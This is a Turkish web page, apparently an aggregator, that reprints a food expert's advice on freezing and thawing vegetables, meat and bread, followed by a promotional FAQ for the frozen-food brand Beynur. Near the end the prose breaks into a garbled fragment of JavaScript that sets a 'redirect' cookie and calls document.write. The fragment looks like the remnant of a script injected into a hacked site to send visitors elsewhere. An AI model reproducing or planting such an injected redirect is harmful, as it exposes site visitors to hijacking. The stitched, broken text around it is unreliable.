News

Dondurulmuş Yemekler

Dondurulmuş Yiyecekler Nasıl Çözdürülmeli? – Mahmure

Gıdaların dondurularak saklanmasının tazeliği koruyacak en iyi yöntemlerden biri olduğunu belirten Gıda Teknolojileri Uzmanı Dr. Öğr. Üyesi Sibel Bölek, çözdürülmüş gıdaların kesinlikle tekrar dondurulmaması konusunda uyardı.

Dondurulmuş Yiyecekler Nasıl Çözdürülmeli? - Mahmure

Gıdalardaki fiziksel ve kimyasal bozulmalar ayrıca gıdaların besin değerlerindeki kayıplar önemli ölçüde önlenir. Fakat bunun için dondurmadan önceki işlemlerde, dondurma esnasında ve çözündürme aşamalarında usulüne uygun davranılması gerekmektedir.

ŞOK HAŞLAMA YAPILMALI

Sebze ve meyveler dondurma öncesinde yıkanıp temizlenmeli, yıkanıp temizlenen sebzelerden gerekene ‘şok haşlama’ yapılmalıdır. Böylece sebzelerin renkleri dondurarak depolama sürecinde daha iyi korunmuş olacak ve bakteriyel yükte de önemli ölçüde azalma gerçekleşecektir. Soğan, ıspanak, kabak lahana, patlıcan, yeşil fasulye, bezelye, havuç, karnabahar, biber ve kereviz için 2-3 dakikalık bir haşlama yeterli olacaktır. Dondurma öncesinde haşlanan sebzelerin suları iyice süzülmeli, kâğıt havlularla kurutulmalıdır. Gerek sebzeler gerekse et ve diğer yiyecekler, bir kerede pişirilecek porsiyonlar halinde paketlere konulmalıdır. Dondurulacak meyveler kesinlikle haşlanmamalıdır. Taze ve zedelenmemiş olanları seçilip yıkanıp kabukları soyulduktan sonra doğranmalı ve içerisinde hava kalmayacak şekilde buzdolabı poşetlerine yerleştirilmelidir.

ET HAVA ALMAYACAK ŞEKİLDE SARILMALIDIR

Etler daima bir defada kullanılacak parçalar halinde hazırlanmalıdır. Etlerin dondurulmasında dikkat edilecek en önemli noktalardan biri de etin dışının hava almayacak şekilde sarılmasıdır. Buna dikkat edilmezse açıkta kalan kısımda donma yanığı dediğimiz açık pembe renkte süngerimsi bir tabaka oluşur. Don yanığı olan kısımda yapısal bozulma gerçekleşir ve besin değerinde kayıplar meydana gelir. Ayrıca lezzette de değişiklikler hissedilir. Böylece et çok yönlü değer kaybına uğrar.

DONDURULMUŞ EKMEK 2-3 AY TAZE KALIR

Uygun şekilde dondurulduğu takdirde ekmekler dondurucuda 2-3 aya kadar tazeliğini koruyacaktır. Ekmeği dilimleyip dondurmak ekmeğin kuruma sürecinin hızlanmasına yol açarak ekmeğe bayat bir tat ve kıvam verebilir. Eğer tek seferde ekmeğin sadece birkaç dilimi yenilecekse, bu durumda en iyi yol ekmeği dilimleyip dondurmaktır. Ekmekler bütün halde ya da dilimler halinde buzdolabı poşetine içerisinde hava kalmayacak şekilde yerleştirilerek dondurucuya konulmalıdır.

EN SAĞLIKSIZ YÖNTEM ODA SICAKLIĞINDA ÇÖZDÜRME 

Dondurulmuş meyve ve sebzelerin çözündürülmesi ile dondurulmuş etlerin ve dondurulmuş ekmeklerin çözündürülmesi birbirinden farklıdır. Sebzeler, pişirme suyuna çözündürmeden atılmalıdır. Eğer çözündürülerek pişirilirse, hücre yapıları bozulur ve besleyici değerlerinde de azalmalar gerçekleşir. Donmuş sebzelerin pişme süreleri, taze sebzelere oranla 3 kat daha kısadır. Dondurulmuş etler ise pişirilmeden önce mutlaka çözündürülmelidir. Dondurulmuş etlerin çözündürülmesinde en sık kullanılan yöntemlerden biri olan oda sıcaklığında bekletme en sağlıksız yöntemlerden biridir. Çünkü oda sıcaklığında bekletme sırasında etin yüzeyinde mikroorganizmalar hızla üreyerek etin mikrobiyal yükünün artmasına sebep olmaktadır. Zaman sıkıntısı yoksa en sağlıklı yöntemlerden biri eti buzdolabının dondurucusundan çıkartarak normal soğutucu bölmesine alarak çözünmesini sağlamaktır. Dondurulmuş etlerin çözündürülmesi için kullanılabilecek yöntemlerden biri de sıcak su banyosudur. Etler su geçirmeyecek bir kap içerisinde konulduktan sonra sıcak su içeren bir tencerede kısa sayılabilecek bir sürede çözündürülebilir. Etlerin çözündürülmesi için en kısa ve pratik yöntemlerden bir başkası da etleri mikrodalga fırında çözündürmektir.

Ekmekler, etler kadar mikrobiyal üremeye uygun bir ortam oluşturmayacaklarından oda sıcaklığında bekletilerek çözündürülebilir. Ekmekler belli oranda çözündükten sonra tost makinası aracılığıyla çözündürme işlemi hızlandırılabilir.

Beynur dondurulmuş gıdalar hakkında en sık sorulan sorular

Dondurulmuş yiyeceklerle her zaman evinizde yemeklerinizi hazır tutarsınız ve Beynur dondurulmuş ürünleri ile sağlıklı ve besleyici sofralar hazırlayabilirsiniz.

Beynur dondurulmuş gıdalar hakkında en sık sorulan sorular

Kabul edelim ki dondurulmuş yemekler hayatımızı kolaylaştırıyor. Özellikle iş hayatımızda yoğun bir programımız varsa dondurulmuş gıdalar bulunmaz bir nimet!

Beynur Dondurulmuş Ürünleri ile zaman kazanmanızın yanında evinizde her zaman taze ve hazır yiyecekleriniz oluyor. Çocuklarınızı hatta misafirlerinizi sıkça şaşırtabilirsiniz.  Titizlikle dondurulan Beynur ürünleri, mutfağınızda her gün sağlıklı ve besleyici sofralar hazırlamanızı sağlar.

Bütün bu kolaylaştırıcı özelliklerinin yanı sıra, çoğumuzun hala dondurulmuş gıdalar hakkında bazı şüpheleri var.  Bazı sorular aklımızın bir ucunda sürekli duruyor.

Şimdi, dondurulmuş gıdalar hakkında sıkça sorulan sorularımızı cevaplayalım.

Dondurulmuş gıdalar hakkında en sık sorulan sorular!

Her şeyden önce, en sık rastlanılan soru: Dondurulmuş gıdalar sağlıklı mıdır?

Dondurduğunuz yiyeceğin besin içeriğine bağlı olsa da çoğu gıdanın  dondurulmuş olması içindeki besinleri sağlık açısından değiştirmez. Eğer gıda orijinal olarak sağlıklıysa, donmuş durum da sağlıklı olacaktır.

Dondurulmuş meyveler, sebzeler, balıklar ve hatta etler çok sağlıklı olabilir. Ama eğer pizzaları, atıştırmalıkları veya diğer sağlıksız yiyecekleri dondurursanız, dondurulmuş formları da sağlıksız olabilir.

Eğer yemeğiniz donmadan önce besleyiciyse, donduktan sonra da besleyicidir. Örnek olarak Beynur, gıdaları en sağlıklı haliyle dondurmak için çok çalışıyor. Dondurulmuş Deniz Ürünlerini düşünelim. Beynur’un Dondurulmuş Balıkları, taze, sağlıklı ve besleyici oldukları anda dondurulur. Bundan dolayı besleyici olma ve sağlıklı olma özelliklerini donduktan sonra da kaybetmezler.

Dondurulmuş gıdalar hakkında en sık sorulan sorular!

Dondurulmuş ürünlerin beslenme değeri nedir?

Dondurulmuş gıdalar hakkında en sık sorulan soru, besin değerleri ile ilgilidir. Donma prosesi; kalori miktarını, lif içeriğini veya gıdadaki mineral miktarını etkilemez, değiştirmez, azaltmaz veya arttırmaz.

Vitaminler için, özellikle de C vitamini için bazı istisnalar olabilir. Ancak, besinlerin besin değeri çoğu dondurma işleminden sonra aynı kalır.  Beynur geniş bir donmuş ürün yelpazesine sahiptir. Dondurulmuş et ürünleri, dondurulmuş balık ürünleri, dondurulmuş tavuk ürünleri ve dondurulmuş unlu ürünleri ile en popüler dondurulmuş gıda firmaları arasındadır.

Et ürünlerinin veya tavuk ürünlerinin dondurulması, bu ürünlerdeki yağ ve protein miktarını etkilemez. Karbonhidrat veya şeker bile etkilenmez.

Dondurulduktan sonra dondurulmuş gıdalar aynı kaloriye sahip midir?

Bu durum aslında yiyeceklerde bulunan sıvıya bağlıdır. Normalde, kalori miktarı donma prosesi ile değişmez. Ama bu yiyeceklerdeki su durumuna göre bazı küçük değişiklikler olabilir: Dondurulan üründe kaybolan sıvı sadece su ise, o dondurulmuş gıda için kalori sayısı değişmeyecektir.

Dondurulmuş gıdalar hakkında en sık sorulan sorular!

Beynur Sağlıklı ve Helal Ürünler!

Beynur, misyonunun gereği doğal ürünleri kullanır. En iyi koruma yönteminde ürünleri ilk günkü tazeliklerinde dondurur.

Geniş ve iyi donanımlı dağıtım ağı sayesinde Almanya, Belçika, Hollanda ve Fransa’daki birçok pazardan Beynur ürünlerini kolaylıkla temin edebilirsiniz.

Beynur ürünlerinin tamamı, sağlıklı koşullarda Avrupa standartlarına göre üretilmekte ve ayrıca helal standartlara da sahiptir.

Beynur; sizin için sağlıktan ödün vermeden lezzetli ürünler üretir. =(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} ]]>

Referans :
www.hurriyet.com.tr
beynur.eu

Bir cavab yazın

Sizin e-poçt ünvanınız dərc edilməyəcəkdir.

Back to top button